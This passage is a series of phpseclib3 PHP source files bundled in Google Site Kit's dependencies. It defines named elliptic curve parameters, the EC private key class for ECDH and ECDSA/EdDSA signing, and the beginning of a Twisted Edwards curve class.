\Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('CF5AC8395BAFEB13C02DA292DDED7A83', 16)); $this->setOrder(new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('FFFFFFFE0000000075A30D1B9038A115', 16)); } } <?php /** * nistt571 * * PHP version 5 and 7 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2017 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://pear.php.net/package/Math_BigInteger */ namespace Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\Curves; final class nistt571 extends \Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\Curves\sect571k1 { } <?php /** * brainpoolP512r1 * * PHP version 5 and 7 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2017 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://pear.php.net/package/Math_BigInteger */ namespace Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\Curves; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\Prime; use Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger; class brainpoolP512r1 extends \Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\Prime { public function __construct() { $this->setModulo(new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('AADD9DB8DBE9C48B3FD4E6AE33C9FC07CB308DB3B3C9D20ED6639CCA703308717D4D9B009BC' . '66842AECDA12AE6A380E62881FF2F2D82C68528AA6056583A48F3', 16)); $this->setCoefficients(new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('7830A3318B603B89E2327145AC234CC594CBDD8D3DF91610A83441CAEA9863BC2DED5D5AA82' . '53AA10A2EF1C98B9AC8B57F1117A72BF2C7B9E7C1AC4D77FC94CA', 16), new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('3DF91610A83441CAEA9863BC2DED5D5AA8253AA10A2EF1C98B9AC8B57F1117A72BF2C7B9E7C' . '1AC4D77FC94CADC083E67984050B75EBAE5DD2809BD638016F723', 16)); $this->setBasePoint(new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('81AEE4BDD82ED9645A21322E9C4C6A9385ED9F70B5D916C1B43B62EEF4D0098EFF3B1F78E2D' . '0D48D50D1687B93B97D5F7C6D5047406A5E688B352209BCB9F822', 16), new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('7DDE385D566332ECC0EABFA9CF7822FDF209F70024A57B1AA000C55B881F8111B2DCDE494A5' . 'F485E5BCA4BD88A2763AED1CA2B2FA8F0540678CD1E0F3AD80892', 16)); $this->setOrder(new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('AADD9DB8DBE9C48B3FD4E6AE33C9FC07CB308DB3B3C9D20ED6639CCA70330870553E5C414CA' . '92619418661197FAC10471DB1D381085DDADDB58796829CA90069', 16)); } } <?php /** * sect131r2 * * PHP version 5 and 7 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2017 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://pear.php.net/package/Math_BigInteger */ namespace Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\Curves; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\Binary; use Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger; class sect131r2 extends \Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\Binary { public function __construct() { $this->setModulo(131, 8, 3, 2, 0); $this->setCoefficients('03E5A88919D7CAFCBF415F07C2176573B2', '04B8266A46C55657AC734CE38F018F2192'); $this->setBasePoint('0356DCD8F2F95031AD652D23951BB366A8', '0648F06D867940A5366D9E265DE9EB240F'); $this->setOrder(new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('0400000000000000016954A233049BA98F', 16)); } } <?php /** * secp128r2 * * PHP version 5 and 7 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2017 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://pear.php.net/package/Math_BigInteger */ namespace Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\Curves; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\Prime; use Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger; class secp128r2 extends \Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\Prime { public function __construct() { // same as secp128r1 $this->setModulo(new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('FFFFFFFDFFFFFFFFFFFFFFFFFFFFFFFF', 16)); $this->setCoefficients(new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('D6031998D1B3BBFEBF59CC9BBFF9AEE1', 16), new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('5EEEFCA380D02919DC2C6558BB6D8A5D', 16)); $this->setBasePoint(new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('7B6AA5D85E572983E6FB32A7CDEBC140', 16), new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('27B6916A894D3AEE7106FE805FC34B44', 16)); $this->setOrder(new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('3FFFFFFF7FFFFFFFBE0024720613B5A3', 16)); } } <?php /** * nistb233 * * PHP version 5 and 7 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2017 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://pear.php.net/package/Math_BigInteger */ namespace Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\Curves; final class nistb233 extends \Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\Curves\sect233r1 { } <?php /** * nistp192 * * PHP version 5 and 7 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2017 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://pear.php.net/package/Math_BigInteger */ namespace Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\Curves; final class nistp192 extends \Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\Curves\secp192r1 { } <?php /** * secp224k1 * * PHP version 5 and 7 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2017 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://pear.php.net/package/Math_BigInteger */ namespace Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\Curves; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\KoblitzPrime; use Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger; class secp224k1 extends \Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\KoblitzPrime { public function __construct() { $this->setModulo(new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFEFFFFE56D', 16)); $this->setCoefficients(new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('00000000000000000000000000000000000000000000000000000000', 16), new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('00000000000000000000000000000000000000000000000000000005', 16)); $this->setBasePoint(new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('A1455B334DF099DF30FC28A169A467E9E47075A90F7E650EB6B7A45C', 16), new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('7E089FED7FBA344282CAFBD6F7E319F7C0B0BD59E2CA4BDB556D61A5', 16)); $this->setOrder(new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('010000000000000000000000000001DCE8D2EC6184CAF0A971769FB1F7', 16)); $this->basis = []; $this->basis[] = ['a' => new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('00B8ADF1378A6EB73409FA6C9C637D', -16), 'b' => new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('94730F82B358A3776A826298FA6F', -16)]; $this->basis[] = ['a' => new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('01DCE8D2EC6184CAF0A972769FCC8B', -16), 'b' => new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('4D2100BA3DC75AAB747CCF355DEC', -16)]; $this->beta = $this->factory->newInteger(new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('01F178FFA4B17C89E6F73AECE2AAD57AF4C0A748B63C830947B27E04', -16)); } } <?php /** * prime239v1 * * PHP version 5 and 7 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2017 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://pear.php.net/package/Math_BigInteger */ namespace Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\Curves; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\Prime; use Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger; class prime239v1 extends \Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\Prime { public function __construct() { $this->setModulo(new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('7FFFFFFFFFFFFFFFFFFFFFFF7FFFFFFFFFFF8000000000007FFFFFFFFFFF', 16)); $this->setCoefficients(new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('7FFFFFFFFFFFFFFFFFFFFFFF7FFFFFFFFFFF8000000000007FFFFFFFFFFC', 16), new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('6B016C3BDCF18941D0D654921475CA71A9DB2FB27D1D37796185C2942C0A', 16)); $this->setBasePoint(new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('0FFA963CDCA8816CCC33B8642BEDF905C3D358573D3F27FBBD3B3CB9AAAF', 16), new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('7DEBE8E4E90A5DAE6E4054CA530BA04654B36818CE226B39FCCB7B02F1AE', 16)); $this->setOrder(new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('7FFFFFFFFFFFFFFFFFFFFFFF7FFFFF9E5E9A9F5D9071FBD1522688909D0B', 16)); } } <?php /** * nistp224 * * PHP version 5 and 7 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2017 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://pear.php.net/package/Math_BigInteger */ namespace Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\Curves; final class nistp224 extends \Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\Curves\secp224r1 { } <?php /** * sect163r1 * * PHP version 5 and 7 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2017 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://pear.php.net/package/Math_BigInteger */ namespace Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\Curves; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\Binary; use Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger; class sect163r1 extends \Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\Binary { public function __construct() { $this->setModulo(163, 7, 6, 3, 0); $this->setCoefficients('07B6882CAAEFA84F9554FF8428BD88E246D2782AE2', '0713612DCDDCB40AAB946BDA29CA91F73AF958AFD9'); $this->setBasePoint('0369979697AB43897789566789567F787A7876A654', '00435EDB42EFAFB2989D51FEFCE3C80988F41FF883'); $this->setOrder(new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('03FFFFFFFFFFFFFFFFFFFF48AAB689C29CA710279B', 16)); } } <?php /** * sect193r2 * * PHP version 5 and 7 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2017 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://pear.php.net/package/Math_BigInteger */ namespace Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\Curves; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\Binary; use Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger; class sect193r2 extends \Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\Binary { public function __construct() { $this->setModulo(193, 15, 0); $this->setCoefficients('0163F35A5137C2CE3EA6ED8667190B0BC43ECD69977702709B', '00C9BB9E8927D4D64C377E2AB2856A5B16E3EFB7F61D4316AE'); $this->setBasePoint('00D9B67D192E0367C803F39E1A7E82CA14A651350AAE617E8F', '01CE94335607C304AC29E7DEFBD9CA01F596F927224CDECF6C'); $this->setOrder(new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('010000000000000000000000015AAB561B005413CCD4EE99D5', 16)); } } <?php /** * brainpoolP384r1 * * PHP version 5 and 7 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2017 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://pear.php.net/package/Math_BigInteger */ namespace Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\Curves; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\Prime; use Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger; class brainpoolP384r1 extends \Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\Prime { public function __construct() { $this->setModulo(new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('8CB91E82A3386D280F5D6F7E50E641DF152F7109ED5456B412B1DA197FB71123ACD3A729901D1A7' . '1874700133107EC53', 16)); $this->setCoefficients(new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('7BC382C63D8C150C3C72080ACE05AFA0C2BEA28E4FB22787139165EFBA91F90F8AA5814A503' . 'AD4EB04A8C7DD22CE2826', 16), new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('4A8C7DD22CE28268B39B55416F0447C2FB77DE107DCD2A62E880EA53EEB62D57CB4390295DB' . 'C9943AB78696FA504C11', 16)); $this->setBasePoint(new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('1D1C64F068CF45FFA2A63A81B7C13F6B8847A3E77EF14FE3DB7FCAFE0CBD10E8E826E03436D' . '646AAEF87B2E247D4AF1E', 16), new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('8ABE1D7520F9C2A45CB1EB8E95CFD55262B70B29FEEC5864E19C054FF99129280E464621779' . '1811142820341263C5315', 16)); $this->setOrder(new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('8CB91E82A3386D280F5D6F7E50E641DF152F7109ED5456B31F166E6CAC0425A7CF3AB6AF6B7FC31' . '03B883202E9046565', 16)); } } <?php /** * secp256k1 * * This is the curve used in Bitcoin * * PHP version 5 and 7 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2017 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://pear.php.net/package/Math_BigInteger */ namespace Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\Curves; //use phpseclib3\Crypt\EC\BaseCurves\Prime; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\KoblitzPrime; use Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger; //class secp256k1 extends Prime class secp256k1 extends \Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\KoblitzPrime { public function __construct() { $this->setModulo(new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFEFFFFFC2F', 16)); $this->setCoefficients(new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('0000000000000000000000000000000000000000000000000000000000000000', 16), new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('0000000000000000000000000000000000000000000000000000000000000007', 16)); $this->setOrder(new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFEBAAEDCE6AF48A03BBFD25E8CD0364141', 16)); $this->setBasePoint(new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('79BE667EF9DCBBAC55A06295CE870B07029BFCDB2DCE28D959F2815B16F81798', 16), new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('483ADA7726A3C4655DA4FBFC0E1108A8FD17B448A68554199C47D08FFB10D4B8', 16)); $this->basis = []; $this->basis[] = ['a' => new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('3086D221A7D46BCDE86C90E49284EB15', -16), 'b' => new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('FF1BBC8129FEF177D790AB8056F5401B3D', -16)]; $this->basis[] = ['a' => new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('114CA50F7A8E2F3F657C1108D9D44CFD8', -16), 'b' => new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('3086D221A7D46BCDE86C90E49284EB15', -16)]; $this->beta = $this->factory->newInteger(new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('7AE96A2B657C07106E64479EAC3434E99CF0497512F58995C1396C28719501EE', -16)); } } <?php /** * EC Parameters * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2015 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC; /** * EC Parameters * * @author Jim Wigginton <terrafrost@php.net> */ final class Parameters extends \Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC { /** * Returns the parameters * * @param string $type * @param array $options optional * @return string */ public function toString($type = 'PKCS1', array $options = []) { $type = self::validatePlugin('Keys', 'PKCS1', 'saveParameters'); return $type::saveParameters($this->curve, $options); } } <?php /** * EC Private Key * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2015 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC; use Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\Common; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\Montgomery as MontgomeryCurve; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\TwistedEdwards as TwistedEdwardsCurve; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\Curves\Curve25519; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\Curves\Ed25519; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\Formats\Keys\PKCS1; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\Formats\Signature\ASN1 as ASN1Signature; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\Hash; use Google\Site_Kit_Dependencies\phpseclib3\Exception\UnsupportedOperationException; use Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger; /** * EC Private Key * * @author Jim Wigginton <terrafrost@php.net> */ final class PrivateKey extends \Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC implements \Google\Site_Kit_Dependencies\phpseclib3\Crypt\Common\PrivateKey { use Common\Traits\PasswordProtected; /** * Private Key dA * * sign() converts this to a BigInteger so one might wonder why this is a FiniteFieldInteger instead of * a BigInteger. That's because a FiniteFieldInteger, when converted to a byte string, is null padded by * a certain amount whereas a BigInteger isn't. * * @var object */ protected $dA; /** * @var string */ protected $secret; /** * Multiplies an encoded point by the private key * * Used by ECDH * * @param string $coordinates * @return string */ public function multiply($coordinates) { if ($this->curve instanceof \Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\Montgomery) { if ($this->curve instanceof \Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\Curves\Curve25519 && self::$engines['libsodium']) { return \sodium_crypto_scalarmult($this->dA->toBytes(), $coordinates); } $point = [$this->curve->convertInteger(new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger(\strrev($coordinates), 256))]; $point = $this->curve->multiplyPoint($point, $this->dA); return \strrev($point[0]->toBytes(\true)); } if (!$this->curve instanceof \Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\TwistedEdwards) { $coordinates = "\x00{$coordinates}"; } $point = \Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\Formats\Keys\PKCS1::extractPoint($coordinates, $this->curve); $point = $this->curve->multiplyPoint($point, $this->dA); if ($this->curve instanceof \Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\TwistedEdwards) { return $this->curve->encodePoint($point); } if (empty($point)) { throw new \RuntimeException('The infinity point is invalid'); } return "\x04" . $point[0]->toBytes(\true) . $point[1]->toBytes(\true); } /** * Create a signature * * @see self::verify() * @param string $message * @return mixed */ public function sign($message) { if ($this->curve instanceof \Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\Montgomery) { throw new \Google\Site_Kit_Dependencies\phpseclib3\Exception\UnsupportedOperationException('Montgomery Curves cannot be used to create signatures'); } $dA = $this->dA; $order = $this->curve->getOrder(); $shortFormat = $this->shortFormat; $format = $this->sigFormat; if ($format === \false) { return \false; } if ($this->curve instanceof \Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\TwistedEdwards) { if ($this->curve instanceof \Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\Curves\Ed25519 && self::$engines['libsodium'] && !isset($this->context)) { $result = \sodium_crypto_sign_detached($message, $this->withPassword()->toString('libsodium')); return $shortFormat == 'SSH2' ? \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::packSSH2('ss', 'ssh-' . \strtolower($this->getCurve()), $result) : $result; } // contexts (Ed25519ctx) are supported but prehashing (Ed25519ph) is not. // quoting https://tools.ietf.org/html/rfc8032#section-8.5 , // "The Ed25519ph and Ed448ph variants ... SHOULD NOT be used" $A = $this->curve->encodePoint($this->QA); $curve = $this->curve; $hash = new \Google\Site_Kit_Dependencies\phpseclib3\Crypt\Hash($curve::HASH); $secret = \substr($hash->hash($this->secret), $curve::SIZE); if ($curve instanceof \Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\Curves\Ed25519) { $dom = !isset($this->context) ? '' : 'SigEd25519 no Ed25519 collisions' . "\x00" . \chr(\strlen($this->context)) . $this->context; } else { $context = isset($this->context) ? $this->context : ''; $dom = 'SigEd448' . "\x00" . \chr(\strlen($context)) . $context; } // SHA-512(dom2(F, C) || prefix || PH(M)) $r = $hash->hash($dom . $secret . $message); $r = \strrev($r); $r = new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger($r, 256); list(, $r) = $r->divide($order); $R = $curve->multiplyPoint($curve->getBasePoint(), $r); $R = $curve->encodePoint($R); $k = $hash->hash($dom . $R . $A . $message); $k = \strrev($k); $k = new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger($k, 256); list(, $k) = $k->divide($order); $S = $k->multiply($dA)->add($r); list(, $S) = $S->divide($order); $S = \str_pad(\strrev($S->toBytes()), $curve::SIZE, "\x00"); return $shortFormat == 'SSH2' ? \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::packSSH2('ss', 'ssh-' . \strtolower($this->getCurve()), $R . $S) : $R . $S; } if (self::$engines['OpenSSL'] && \in_array($this->hash->getHash(), \openssl_get_md_methods())) { $signature = ''; // altho PHP's OpenSSL bindings only supported EC key creation in PHP 7.1 they've long // supported signing / verification // we use specified curves to avoid issues with OpenSSL possibly not supporting a given named curve; // doing this may mean some curve-specific optimizations can't be used but idk if OpenSSL even // has curve-specific optimizations $result = \openssl_sign($message, $signature, $this->withPassword()->toString('PKCS8', ['namedCurve' => \false]), $this->hash->getHash()); if ($result) { if ($shortFormat == 'ASN1') { return $signature; } \extract(\Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\Formats\Signature\ASN1::load($signature)); return $this->formatSignature($r, $s); } } $e = $this->hash->hash($message); $e = new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger($e, 256); $Ln = $this->hash->getLength() - $order->getLength(); $z = $Ln > 0 ? $e->bitwise_rightShift($Ln) : $e; while (\true) { $k = \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger::randomRange(self::$one, $order->subtract(self::$one)); list($x, $y) = $this->curve->multiplyPoint($this->curve->getBasePoint(), $k); $x = $x->toBigInteger(); list(, $r) = $x->divide($order); if ($r->equals(self::$zero)) { continue; } $kinv = $k->modInverse($order); $temp = $z->add($dA->multiply($r)); $temp = $kinv->multiply($temp); list(, $s) = $temp->divide($order); if (!$s->equals(self::$zero)) { break; } } // the following is an RFC6979 compliant implementation of deterministic ECDSA // it's unused because it's mainly intended for use when a good CSPRNG isn't // available. if phpseclib's CSPRNG isn't good then even key generation is // suspect /* // if this were actually being used it'd probably be better if this lived in load() and createKey() $this->q = $this->curve->getOrder(); $dA = $this->dA->toBigInteger(); $this->x = $dA; $h1 = $this->hash->hash($message); $k = $this->computek($h1); list($x, $y) = $this->curve->multiplyPoint($this->curve->getBasePoint(), $k); $x = $x->toBigInteger(); list(, $r) = $x->divide($this->q); $kinv = $k->modInverse($this->q); $h1 = $this->bits2int($h1); $temp = $h1->add($dA->multiply($r)); $temp = $kinv->multiply($temp); list(, $s) = $temp->divide($this->q); */ return $this->formatSignature($r, $s); } /** * Returns the private key * * @param string $type * @param array $options optional * @return string */ public function toString($type, array $options = []) { $type = self::validatePlugin('Keys', $type, 'savePrivateKey'); return $type::savePrivateKey($this->dA, $this->curve, $this->QA, $this->secret, $this->password, $options); } /** * Returns the public key * * @see self::getPrivateKey() * @return mixed */ public function getPublicKey() { $format = 'PKCS8'; if ($this->curve instanceof \Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\Montgomery) { $format = 'MontgomeryPublic'; } $type = self::validatePlugin('Keys', $format, 'savePublicKey'); $key = $type::savePublicKey($this->curve, $this->QA); $key = \Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC::loadFormat($format, $key); if ($this->curve instanceof \Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\Montgomery) { return $key; } $key = $key->withHash($this->hash->getHash())->withSignatureFormat($this->shortFormat); if ($this->curve instanceof \Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\TwistedEdwards) { $key = $key->withContext($this->context); } return $key; } /** * Returns a signature in the appropriate format * * @return string */ private function formatSignature(\Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger $r, \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger $s) { $format = $this->sigFormat; $temp = new \ReflectionMethod($format, 'save'); $paramCount = $temp->getNumberOfRequiredParameters(); // @codingStandardsIgnoreStart switch ($paramCount) { case 2: return $format::save($r, $s); case 3: return $format::save($r, $s, $this->getCurve()); case 4: return $format::save($r, $s, $this->getCurve(), $this->getLength()); } // @codingStandardsIgnoreEnd // presumably the only way you could get to this is if you were using a custom plugin throw new \Google\Site_Kit_Dependencies\phpseclib3\Exception\UnsupportedOperationException("{$format}::save() has {$paramCount} parameters - the only valid parameter counts are 2 or 3"); } } <?php /** * Curves over a*x^2 + y^2 = 1 + d*x^2*y^2 * * http://www.secg.org/SEC2-Ver-1.0.pdf provides for curves with custom parameters. * ie. the coefficients can be arbitrary set through specially formatted keys, etc. * As such, Prime.php is built very generically and it's not able to take full * advantage of curves with 0 coefficients to produce simplified point doubling, * point addition. Twisted Edwards curves, in contrast, do not have a way, currently, * to customize them. As such, we can omit the super generic stuff from this class * and let the named curves (Ed25519 and Ed448) define their own custom tailored * point addition and point doubling methods. * * More info: * * https://en.wikipedia.org/wiki/Twisted_Edwards_curve * * PHP version 5 and 7 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2017 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://pear.php.net/package/Math_BigInteger */ namespace Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves; use Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger; use Google\Site_Kit_Dependencies\phpseclib3\Math\PrimeField; use Google\Site_Kit_Dependencies\phpseclib3\Math\PrimeField\Integer as PrimeInteger; /** * Curves over a*x^2 + y^2 = 1 + d*x^2*y^2 * * @author Jim Wigginton <terrafrost@php.net> */ class TwistedEdwards extends \Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\Base { /** * The modulo * * @var BigInteger */ protected $modulo; /** * Cofficient for x^2 * * @var object */ protected $a; /** * Cofficient for x^2*y^2 * * @var object */ protected $d; /** * Base Point * * @var object[] */ protected $p; /** * The number zero over the specified finite field * * @var object */ protected $zero; /** * The number one over the specified finite field * * @var object */ protected $one; /** * The number two over the specified finite field * * @var object */ protected $two; /** * Sets the modulo */ public function setModulo(\Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger $modulo) { $this->modulo = $modulo; $this->factory = new \Google\Site_Kit_Dependencies\phpseclib3\Math\PrimeField($modulo); $this->zero = $this->factory->newInteger(new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger(0)); $this->one = $this->factory->newInteger(new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger(1)); $this->two = $this->factory->newInteger(new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger(2)); } /** * Set coefficients a and b */ public function setCoefficients(\Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger $a, \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger $d) { if (!isset($this->factory)) { throw new \RuntimeException('setModulo needs to be called before this method'); } $this->a = $this->factory->newInteger($a); $this->d = $this->factory->newInteger($d); } /** * Set x and y 